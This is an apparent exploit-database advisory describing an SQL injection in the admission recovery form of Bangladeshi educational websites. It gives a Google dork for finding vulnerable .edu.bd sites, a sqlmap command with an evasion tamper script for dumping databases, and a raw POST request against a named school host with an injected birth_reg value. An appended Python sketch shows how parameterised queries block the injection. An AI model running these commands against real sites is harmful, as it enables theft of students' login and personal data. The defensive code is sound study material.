Bangladesh EDU CMS SQL Injection => Recovery Login Info

2020.06.27
blackh4wk (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Bangladesh EDU SQL Injection => Recovery Login Info
# Google Dork : inurl:/admission/recovery/ site:edu.bd
# Exploit Author : blackh4wk
# Date : 2020-06-27
# Tested On : windows 10, Firefox
# Category : webapps

sqlmap.py -r post.txt -p birth_reg --random-agent --tamper="randomcase.py" --batch --dbs

HTTP REQUEST :

POST /admission/recovery/ HTTP/1.1
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Referer: https://akkelpurghs.edu.bd/
Cookie: PHPSESSID=cp38c6i36a6qdli3l1gr5c4pj5
Host: akkelpurghs.edu.bd
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

submit=&birth_reg=1'%22&mobile=987-65-4329

POST SQL Command -> submit=&birth_reg=1'%22&mobile=987-65-4329

***********************************************************************
Twitter : @rooterh4wk
Discord : blackh4wk#8991
***********************************************************************
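The advisory names birth_reg as the injectable POST field but does not show the server-side code. As an added example (not the author's or the vendor's code), the Python sketch below contrasts a concatenated recovery query with a bound-parameter one, using the decoded probe value from the request above. The sqlite3 table, column names, sample row and field formats are assumptions made for illustration.

```python
import re
import sqlite3

# Decoded form of birth_reg=1'%22 from the request on this page.
PROBE = "1'\""

def make_db():
    """Constructed in-memory table; the real schema is not shown on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE applicants (birth_reg TEXT, mobile TEXT, login TEXT)")
    db.execute("INSERT INTO applicants VALUES "
               "('19990123456789012', '01700000000', 'student01')")  # constructed row
    return db

def recover_concat(db, birth_reg, mobile):
    """Vulnerable pattern: request fields are spliced into the SQL text."""
    sql = ("SELECT login FROM applicants WHERE birth_reg = '" + birth_reg +
           "' AND mobile = '" + mobile + "'")
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        # A quote in the field changed the statement's structure.
        return "SQL error: " + str(exc)

# Assumed field formats: digits for birth_reg, digits/+/- for mobile.
BIRTH_REG_RE = re.compile(r"\d{1,20}")
MOBILE_RE = re.compile(r"[0-9+\-]{6,20}")

def recover_bound(db, birth_reg, mobile, validate=True):
    """Hardened pattern: optional allow-list check, then bound parameters."""
    if validate and not (BIRTH_REG_RE.fullmatch(birth_reg)
                         and MOBILE_RE.fullmatch(mobile)):
        return []  # rejected before any SQL is built
    sql = "SELECT login FROM applicants WHERE birth_reg = ? AND mobile = ?"
    # Values travel separately from the statement, so quotes stay data.
    return [row[0] for row in db.execute(sql, (birth_reg, mobile))]

if __name__ == "__main__":
    db = make_db()
    print(recover_concat(db, PROBE, "987-65-4329"))
    print(recover_bound(db, PROBE, "987-65-4329", validate=False))
    print(recover_bound(db, "19990123456789012", "01700000000"))
```

The database error returned by the concatenated version is the signal an automated scanner keys on; the bound version returns an empty result for the same input whether or not the format check runs first.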



Copyright 2020, cxsecurity.com

 
